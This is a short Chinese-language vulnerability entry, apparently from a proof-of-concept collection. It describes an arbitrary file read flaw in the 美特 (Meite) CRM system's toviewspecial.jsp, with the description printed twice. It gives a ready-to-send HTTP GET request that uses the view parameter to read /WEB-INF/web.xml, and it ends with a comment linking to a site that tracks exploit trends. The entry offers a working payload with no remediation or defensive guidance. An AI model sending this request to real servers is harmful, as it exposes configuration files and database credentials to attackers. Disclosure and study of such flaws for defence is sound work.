Description
美特CRM系统 toviewspecial.jsp存在任意文件读取漏洞,攻击者可通过构造恶意请求绕过安全限制,直接读取服务器上的敏感文件(如配置文件、数据库凭证、日志文件等),导致系统信息泄露和进一步安全风险。
美特CRM系统 toviewspecial.jsp存在任意文件读取漏洞,攻击者可通过构造恶意请求绕过安全限制,直接读取服务器上的敏感文件(如配置文件、数据库凭证、日志文件等),导致系统信息泄露和进一步安全风险。
GET /business/common/toviewspecial.jsp?view=/WEB-INF/web.xml HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.